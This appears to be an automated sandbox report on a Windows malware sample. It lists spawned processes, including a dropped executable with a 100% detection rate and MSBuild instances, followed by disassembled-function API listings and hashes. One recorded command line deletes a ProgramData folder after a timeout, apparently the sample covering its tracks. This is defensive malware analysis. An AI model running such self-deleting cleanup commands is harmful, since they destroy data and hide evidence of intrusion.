Imagebase:	0xa90000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:47:39
Start date:	08/10/2024
Path:	C:\ProgramData\AKEGIIJDGH.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\AKEGIIJDGH.exe"
Imagebase:	0xd0000
File size:	568'400 bytes
MD5 hash:	F56A4A7B59E1E81087BB64A4A70FB32F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:47:39
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x90000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:47:39
Start date:	08/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0x9d0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:47:40
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6008 -s 300
Imagebase:	0xa90000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:47:42
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKFIJJEGHDAE" & exit
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:47:42
Start date:	08/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:47:42
Start date:	08/10/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x400000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.2%
Total number of Nodes:	74
Total number of Limit Nodes:	2

Executed Functions

Function 00C420FE Relevance: 2.0, APIs: 1, Instructions: 474
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(00CCFCF0,000004E4,00000040,?), ref: 00C42664

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 121da205fbc95be4f8875c7fd9bc33353a0ecac859792eaec91b51658260fede
Instruction ID: a0314f85b5cc9bc1592109d051cb9f24a7a42411b2c6916143cd5c617b4e37db
Opcode Fuzzy Hash: 121da205fbc95be4f8875c7fd9bc33353a0ecac859792eaec91b51658260fede
Instruction Fuzzy Hash: C0C1ED27630E1A06E31C643699533F6A58EEBE6730FD58337BE66C72F0D3AD49429240

Non-executed Functions

Function 00C5F8B3 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C5FA97

Strings

1#IND, xrefs: 00C5F9B8
1#INF, xrefs: 00C5F9E9
1#QNAN, xrefs: 00C5F9C6
1#SNAN, xrefs: 00C5F9BF

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: d979b0fbc28fb76f7f6262ba1b5aed1182a0c4e9a68a4683a868312da40a36e9
Instruction ID: f6cc2424a96840efe614c6bc720cb4ee4994999e7715a04c08f5c261fa56cd51
Opcode Fuzzy Hash: d979b0fbc28fb76f7f6262ba1b5aed1182a0c4e9a68a4683a868312da40a36e9
Instruction Fuzzy Hash: 61D22971E086288FDB75CE28DD807EAB7B5EB44305F2441EAD85DE7240EB74AE858F41

Function 00C5ED2C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00C5F04A,00000002,00000000,?,?,?,00C5F04A,?,00000000), ref: 00C5EDC5
GetLocaleInfoW.KERNEL32(?,20001004,00C5F04A,00000002,00000000,?,?,?,00C5F04A,?,00000000), ref: 00C5EDEE
GetACP.KERNEL32(?,?,00C5F04A,?,00000000), ref: 00C5EE03

Strings

ACP, xrefs: 00C5ED4A
OCP, xrefs: 00C5ED80

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: b8a6d1d84108681dc1d2320ad6ebfcf48be164f76e63ce9857d3115712188a0a
Instruction ID: 79dcf9592639ac8dd67965fd5be56139ab6d3dce6f9da1f33578ece23dfe1a14
Opcode Fuzzy Hash: b8a6d1d84108681dc1d2320ad6ebfcf48be164f76e63ce9857d3115712188a0a
Instruction Fuzzy Hash: 3E21C16A600100AADB3C8F55C905B9772B7EF50F52B168564ED29D7100F732DFC8C398

Function 00C5EF01 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C5F00D
IsValidCodePage.KERNEL32(00000000), ref: 00C5F056
IsValidLocale.KERNEL32(?,00000001), ref: 00C5F065
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C5F0AD
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C5F0CC

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 4a2f14e0dd7c511c85d3848a9e4f0724674ea2a7bc6237896651a04a4a557a51
Instruction ID: fe72fb80e9504bcf35f587e94b649d38b64d85ac5ce81c14d6dab070e444f182
Opcode Fuzzy Hash: 4a2f14e0dd7c511c85d3848a9e4f0724674ea2a7bc6237896651a04a4a557a51
Instruction Fuzzy Hash: D2519F75900215ABDB28DFA5DC41BBE73B8BF48702F080569FD11E7191EBB09A898B64

Function 00C5E59D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

GetACP.KERNEL32(?,?,?,?,?,?,00C53345,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C5E65E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C53345,?,?,?,00000055,?,-00000050,?,?), ref: 00C5E689
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C5E7EC

Strings

utf8, xrefs: 00C5E75B

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 026b841887487f6fc43451124105e030b1d859b1c1b160bd9968e1b53d70e94f
Instruction ID: 3d8a94291ba8004c192899398659318a75e58f6775da59046341fade3766950d
Opcode Fuzzy Hash: 026b841887487f6fc43451124105e030b1d859b1c1b160bd9968e1b53d70e94f
Instruction Fuzzy Hash: 4F711B79604305AAD738AF75CC82BAA73A8EF18742F140029FD15D7181FA70EFC89759

Function 00C55792 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00C5581F

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 67dcbb991ee0e8000222c2bf8223ff414f3ab30b84ccd36d11dfe47dd2cf06b0
Instruction ID: b6cc9e96aea69caf4df5093461db3106975174eb05bf9435118f30d6f3e1b8fe
Opcode Fuzzy Hash: 67dcbb991ee0e8000222c2bf8223ff414f3ab30b84ccd36d11dfe47dd2cf06b0
Instruction Fuzzy Hash: 1DB1AD36D046459FDB11CF68C8E17FEBBA5EF55311F14426AEC10AB381C2349E8ACBA4

Function 00C48FBB Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C48FC7
IsDebuggerPresent.KERNEL32 ref: 00C49093
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C490AC
UnhandledExceptionFilter.KERNEL32(?), ref: 00C490B6

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: be716b90c7a61fb0da3fa56ff762b7eb68351e89871998217cadaaa067db286f
Instruction ID: f3d4d72e878130fe5b97ed0ba52c67ab2b658a38e9b0ebd397b70e5a652bfce9
Opcode Fuzzy Hash: be716b90c7a61fb0da3fa56ff762b7eb68351e89871998217cadaaa067db286f
Instruction Fuzzy Hash: 0431F675D052299BDB21DFA5D9897CDBBB8FF08300F1041AAE50CAB250EBB19A849F45

Function 00C5E9B0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00C56984: GetLastError.KERNEL32(?,?,00C51794,?,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?), ref: 00C56988
Part of subcall function 00C56984: SetLastError.KERNEL32(00000000,00C4EABF,?,?,00000003,00C4DCCB,?,?,?,?,00000000,00C4EABF,?,?,?), ref: 00C56A2A

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5EA04
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5EA4E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C5EB14

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: e3e869da6c34d176f139a0c7e6222ee3147481151bb31907044ce15121bdac0e
Instruction ID: 02784bba3725336455a3d9908782c4533075fd6ef8ddb1fe42af743d85a436b8
Opcode Fuzzy Hash: e3e869da6c34d176f139a0c7e6222ee3147481151bb31907044ce15121bdac0e
Instruction Fuzzy Hash: 5F618F795142179BDB2C9F28CC82BAA77A8FF04302F144169ED16C6285E774DBC8DB58

Function 00C4ED09 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00C4EE01
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00C4EE0B
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00C4EE18

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1238ded521d7a1820a135ba73609f1dc0c2f37a19a28e91a2a9ffc5bfddad5c4
Instruction ID: ebd4721220bbb09753391773ff027d6777180265bc6462d671fffea1ff3f3b1b
Opcode Fuzzy Hash: 1238ded521d7a1820a135ba73609f1dc0c2f37a19a28e91a2a9ffc5bfddad5c4
Instruction Fuzzy Hash: D231C2759012299BCB21DF68D98978DBBB8FF18310F5041EAE51CA62A0EB709F858F44

Function 00C517E0 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8907c3dbf28a80ee1510cdec41fff3e2514c0facb0919369712f6a28b59a9e
Instruction ID: 5d31149afdf4ccb85a70f43d00c1b183dd40f45371d851a6da4bcaf7ece6d1d1
Opcode Fuzzy Hash: cb8907c3dbf28a80ee1510cdec41fff3e2514c0facb0919369712f6a28b59a9e
Instruction Fuzzy Hash: 00F14C75E012199FDF14CFA9C884BADB7B1FF88315F198269EC25A7380D730AE458B94

Function 00C8B4F3 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

UT, xrefs: 00C8B81E
/, xrefs: 00C8B5A6

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 20bb723b0a5b6e542a701e23a403943098c04dccb459157f2ead8edf7df2d018
Instruction ID: c2b2a610a093dca49824fe9572e7eac500ac7827eceba5a6596b3b85557ab3bb
Opcode Fuzzy Hash: 20bb723b0a5b6e542a701e23a403943098c04dccb459157f2ead8edf7df2d018
Instruction Fuzzy Hash: 1002C4B1D042688FDF25EF24C8807EEBBB5AF45308F0440E9D959AB246D7349E84CF99

Function 00C88588 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

``C, xrefs: 00C885FE
x`C, xrefs: 00C88617

Memory Dump Source

Source File: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID: ``C$x`C
API String ID: 0-4276601940
Opcode ID: 2facb5888a9830f7450ebd39a3b62939e3569205078117a0d6d3b64075eb6d7d
Instruction ID: 1ad6cede29322861b8e350535606f5e2b3f11617e004de6a373c4a2579309098
Opcode Fuzzy Hash: 2facb5888a9830f7450ebd39a3b62939e3569205078117a0d6d3b64075eb6d7d
Instruction Fuzzy Hash: 9E51F4739001169BEB18DF58C4C12E973B1EF84308F6684BED85AEF286EF305A05CB58

Function 00C571FF Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C571FA,?,?,00000008,?,?,00C63185,00000000), ref: 00C5742C

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: d936bded9d2e1f035556bfd33bff5534871486de66f2a70c21084e4e5f228721
Instruction ID: 7eafe220aa79421114e0fe24c922da22e50eaa441d5a88bab2edb06591b2a7d4
Opcode Fuzzy Hash: d936bded9d2e1f035556bfd33bff5534871486de66f2a70c21084e4e5f228721
Instruction Fuzzy Hash: 30B15C35214608CFDB15CF28D48AA647BA0FF45366F258658ECA9CF2A1C335EAD5CF44

Function 00C4893C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C48952

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 65f9446ac1a7239c4356272d3447475a785320612a9b6589f809341d1173b404
Instruction ID: 6b658394efeb56f6b5803e01b65b5d0e26fcbc7f10d50dc274a08d8fd819e4bd
Opcode Fuzzy Hash: 65f9446ac1a7239c4356272d3447475a785320612a9b6589f809341d1173b404
Instruction Fuzzy Hash: 75A1BDB19056059FDB28CF69E8823ADBBF0FB48314F24A13ED429EB361E3749945CB50

Function 00C5BFD4 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2242759400.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.2242616972.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242989695.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243074417.0000000000C6F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243208653.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243258998.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2243302692.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
